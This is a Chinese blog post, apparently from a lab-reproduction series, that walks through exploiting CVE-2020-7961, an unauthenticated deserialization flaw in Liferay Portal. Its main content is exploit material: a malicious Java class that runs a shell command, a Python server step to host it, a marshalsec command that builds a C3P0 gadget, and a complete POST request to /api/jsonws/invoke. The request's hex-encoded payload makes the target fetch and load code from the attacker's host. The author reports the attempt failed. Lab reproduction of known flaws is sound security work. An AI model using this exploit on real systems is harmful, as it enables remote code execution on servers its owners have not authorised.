Liferay RCE(CVE-2020-7961)

最新推荐文章于 2023-04-07 16:14:55 发布
最新推荐文章于 2023-04-07 16:14:55 发布
阅读量334 收藏
点赞数
分类专栏: vulhub漏洞复现 文章标签: java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/EC_Carrot/article/details/118631377
版权

影响范围

  • Liferay Portal 6.1.X
  • Liferay Portal 6.2.X
  • Liferay Portal 7.0.X
  • Liferay Portal 7.1.X
  • Liferay Portal 7.2.X

漏洞复现

首先准备一个恶意java文件LifExp.java

public class LifExp {

static {
    try {
            String[] cmd = {"bash", "-c", "touch /tmp/success"};
            java.lang.Runtime.getRuntime().exec(cmd).waitFor();
        } catch ( Exception e ) {
            e.printStackTrace();
        }
    }
}

在该文件同目录下使用命令javac LifExp.java编译该文件,并且用python开一个简易http服务

python3 -m http.server 8000

然后,我们需要借助marshalsec来完成生成Poc的操作

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson C3P0WrapperConnPool http://your_ip:8000/ LifExp

在这里插入图片描述
我们需要使用以上Poc来修改以下包
在这里插入图片描述
主要更改defaultData=defaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource=,后面则接上剩下的
综上所述可以把包修改成以下这样

POST /api/jsonws/invoke HTTP/1.1
Host: your-ip:8080
Content-Length: 1346
Content-Type: application/x-www-form-urlencoded
Connection: close

cmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth=o3lt8q1F&formDate=1585270368703&tableId=1&name=2&type=3&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource={"userOverridesAsString":"HexAsciiSerializedMap:aced00057372003d636f6d2e6d6368616e67652e76322e6e616d696e672e5265666572656e6365496e6469726563746f72245265666572656e636553657269616c697a6564621985d0d12ac2130200044c000b636f6e746578744e616d657400134c6a617661782f6e616d696e672f4e616d653b4c0003656e767400154c6a6176612f7574696c2f486173687461626c653b4c00046e616d6571007e00014c00097265666572656e63657400184c6a617661782f6e616d696e672f5265666572656e63653b7870707070737200166a617661782e6e616d696e672e5265666572656e6365e8c69ea2a8e98d090200044c000561646472737400124c6a6176612f7574696c2f566563746f723b4c000c636c617373466163746f72797400124c6a6176612f6c616e672f537472696e673b4c0014636c617373466163746f72794c6f636174696f6e71007e00074c0009636c6173734e616d6571007e00077870737200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78700000000000000000757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000a70707070707070707070787400064c696645787074001b687474703a2f2f3139322e3136382e33302e3132383a383030302f740003466f6f;"}

提交包,即可运行命令,但我没做出来。。。不知道哪里错了

小 白 萝 卜
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
LiferayPortal JSONWS反序列化漏洞(CVE-2020-7961)分析
不忘初心,护天下安全!
06-28 706
2020年03月20日,Code White发现了影响Liferay Portal版本6.1、6.2、7.0、7.1和7.2的多个关键级别的JSON反序列化漏洞。它们允许通过JSON web服务API执行未经身份验证的远程代码。修复的Liferay Portal版本有6.2 GA6、7.0 GA7、7.1 GA4和7.2 GA2。Liferay(又称Liferay Portal)是一个开源门户项目,该项目包含了一个完整的J2EE应用,以创建Web站点、内部网,以此来向适当的客户群显示符合他们的文档和应用程序
liferay-developer-guide-6.0_liferay_
10-04
liferay developer guide
(CVE-2020-7961)Liferay Portal RCE 反序列化命令执行漏洞
thelostworld
12-19 1381
(CVE-2020-7961)Liferay Portal RCE 反序列化命令执行漏洞 一、漏洞描述 Liferay Portal CE是一款用来快速构建网站的开源系统。其7.2.0 GA1及以前的版本API接口中存在一处反序列化漏洞,利用该漏洞可在目标服务器上执行任意命令。 ​ 二、影响版本 Liferay Portal CE<V7.2.0 GA1 三、漏洞复现 执行如下命令启动Liferay Portal 7.2.0 GA1: docker-compo...
CVE-2020-7961 Liferay Portal 代码执行漏洞复现
爱国小白帽
04-28 5304
CVE-2020-7961 Liferay Portal 代码执行漏洞复现 原创 shadow1ng [雷神众测](javascript:void(0)???? 今天 声明 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测以及文章作者不为此承担任何责任。 雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内...
CVE-2020-7961Liferay Portal 反序列化漏洞分析
爱国小白帽
04-26 1445
CVE-2020-7961Liferay Portal 反序列化漏洞分析 360CERT [安全客](javascript:void(0)???? 今天 作者:Hu3sky@360CERT 新媒体管家排版 2020年03月20日,Code White发现了影响Liferay Portal版本6.1、6.2、7.0、7.1和7.2的多个关键级别的JSON反序列化漏洞。它们允许通过JSON web服务A...
Goby漏洞更新|Liferay Portal 7.2.1 版本 invoke 文件远程代码执行漏洞(CVE-2020-7961
m0_46699477的博客
04-07 209
Liferay Portal是美国Liferay公司的一套基于J2EE的门户解决方案。该方案使用了EJB以及JMS等技术,并可作为Web发布和共享工作区、企业协作平台、社交网络等。Liferay Portal 7.2.1 CE GA2之前版本中存在代码问题漏洞。远程攻击者可借助JSON Web服务利用该漏洞执行任意代码。
liferay-journal-article-converter:从Liferay期刊文章到自定义Java对象
02-03
Liferay新闻文章转换器 ... < artifactId>liferay-journal-article-converter < version>0.1.0 用法 基本范例 首先检查您的Journal Article XML结构。 <? xml version = " 1.0 " ?> < root
liferay-plugins-sdk-6.1.1-20130816114619181.zip
10-17
liferay-plugins-sdk-6.1.1-20130816114619181.zip是liferay开发中不可缺少的文件,还有src文件,liferay-eclipse等
liferay-jquery-plugins
07-11
liferay-jquery-plugins Liferay 门户的 jQuery 插件 建造 启动并运行环境 克隆这个 repo git clone https://github.com/natecavanaugh/liferay-jquery-plugins.git 安装 安装 <sudo> npm install --global ...
java源码直接复制jsp-liferay-blade-samples:liferay-blade-样品
06-05
您可以通过为三个构建工具之一创建项目并向liferay/liferay-blade-samples发送拉取请求来贡献其他模板liferay/liferay-blade-samples 。 一旦提交获得批准,存储库管理员将审查提交并为其他三个构建工具复制项目。 ...
CVE-2020-7961 Liferay Portal 反序列化
Emonsec
05-11 1048
漏洞说明 Liferay是一个开源的Portal产品,提供对多个独立系统的内容集成,为企业信息、流程等的整合提供了一套完整的解决方案,和其他商业产品相比,Liferay有着很多优良的特性,而且免费,在全球都有较多用户。该洞是个反序列化导致的RCE,通过未授权访问其api传递json数据进行反序列化,危害较高 影响范围 Liferay Portal 6.1、6.2、7.0、7.1、7.2 环境搭建 漏洞环境:https://github.com/liferay/liferay-portal/releases/
远程反序列化rce漏洞_Liferay Portal CE 系统反序列化RCE漏洞复现(CVE-2020-7961
weixin_42412939的博客
01-15 737
Liferay Portal CE是一款用来快速构建网站的开源系统。在7.2.1 CE GA2之前的Liferay Portal中,对不可信数据的反序列化允许远程攻击者通过JSON web服务(JSONWS)执行任意代码。官方网站https://www.oschina.net影响范围Liferay Portal 6.1.XLiferay Portal 6.2.XLiferay Portal 7.0...
Liferay Portal Json Web Service 反序列化漏洞(CVE-2020-7961)
whatday的专栏
08-12 540
之前在CODE WHITE上发布了一篇关于Liferay Portal JSON Web Service RCE的漏洞,之前是小伙伴在处理这个漏洞,后面自己也去看了。Liferay Portal对于JSON Web Service的处理,在6.1、6.2版本中使用的是Flexjson库,在7版本之后换成了Jodd Json。 总结起来该漏洞就是:Liferay Portal提供了Json Web Service服务,对于某些可以调用的端点,如果某个方法提供的是Object参数类型,那么就能够构造符合Ja.
Liferay Portal CE 反序列化命令执行漏洞(CVE-2020-7961
锋刃科技的博客
06-19 3544
简介 Liferay Portal CE是一款用来快速构建网站的开源系统。其7.2.0 GA1及以前的版本API接口中存在一处反序列化漏洞,利用该漏洞可在目标服务器上执行任意命令。 影响版本 Liferay Portal: 6.1、6.2、7.0、7.1、7.2 环境搭建 cd /vulhub/liferay-portal/CVE-2020-7961 docker-compose up -d 启动成功后,访问http://your-ip:8080即可查看到默认首页 漏洞复现 首先准
liferay CVE-2020-7961 漏洞回显
u013224189的专栏
04-22 1695
liferay CVE-2020-7961 漏洞回显 import com.liferay.portal.kernel.security.access.control.AccessControlUtil; import com.liferay.portal.kernel.security.auth.AccessControlContext; import javax.servlet.http.H...
Joomla 1.5.12 RCE via TinyMCE upload vulnerability
cnbird's blog
09-02 1204
Joomla 1.5.12 RCE via TinyMCE upload vulnerability
Liferay Portal CVE-2020-7961
你和萤火虫有两个共同点,在我的眼里都会发光,同时,都已经很多年没见了
05-06 6299
一、产品介绍 Liferay(又称Liferay Portal)是一个开源门户项目,该项目包含了一个完整的J2EE应用。该项目使用了Web、EJB以及JMS等技术,特别是其前台界面部分使用Struts 框架技术,基于XML的portlet配置文件可以自由地动态扩展,使用了Web Services来支持一些远程信息的获取,使用 Apache Lucene实现全文检索功能。 二、漏洞...
liferay 使用手册
最新发布
11-15
Liferay 使用手册是指Liferay平台的一份详细说明文档,用于指导用户如何正确安装、配置和使用Liferay平台的各项功能和特性。 Liferay是一种开源的企业门户解决方案,它提供了许多功能和工具,方便用户快速搭建和管理自己的网站、门户或应用程序。然而,对于不熟悉Liferay的用户来说,往往需要一个指导手册来帮助他们更好地理解和使用平台。 Liferay 使用手册通常会包含以下内容: 1. 安装和部署指南:介绍如何正确安装和部署Liferay平台,并提供相应的操作步骤和注意事项。 2. 配置和管理:详细说明如何进行Liferay平台的配置和管理,包括用户管理、权限设置、主题和布局等。 3. 内容管理:介绍如何创建和管理网站的内容,包括新闻、博客、论坛等功能,并提供相应的操作示例。 4. 社交协作:解释如何使用Liferay平台进行协作和合作,包括团队和项目管理、文档共享、日历和通知等。 5. 应用程序开发:指导开发人员如何使用Liferay平台进行应用程序的开发和集成,包括使用API和插件的方式。 6. 故障排除和支持:提供常见问题的解答和故障排除的方法,以及如何获取更多的支持和帮助。 总之,Liferay 使用手册是一份重要的指导文档,它可以帮助用户快速入门和掌握Liferay平台的使用方法,提高工作效率和用户体验。用户可以根据手册中提供的步骤和示例,了解和掌握各个功能的使用方式,从而更好地利用Liferay平台来满足自己的需求。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值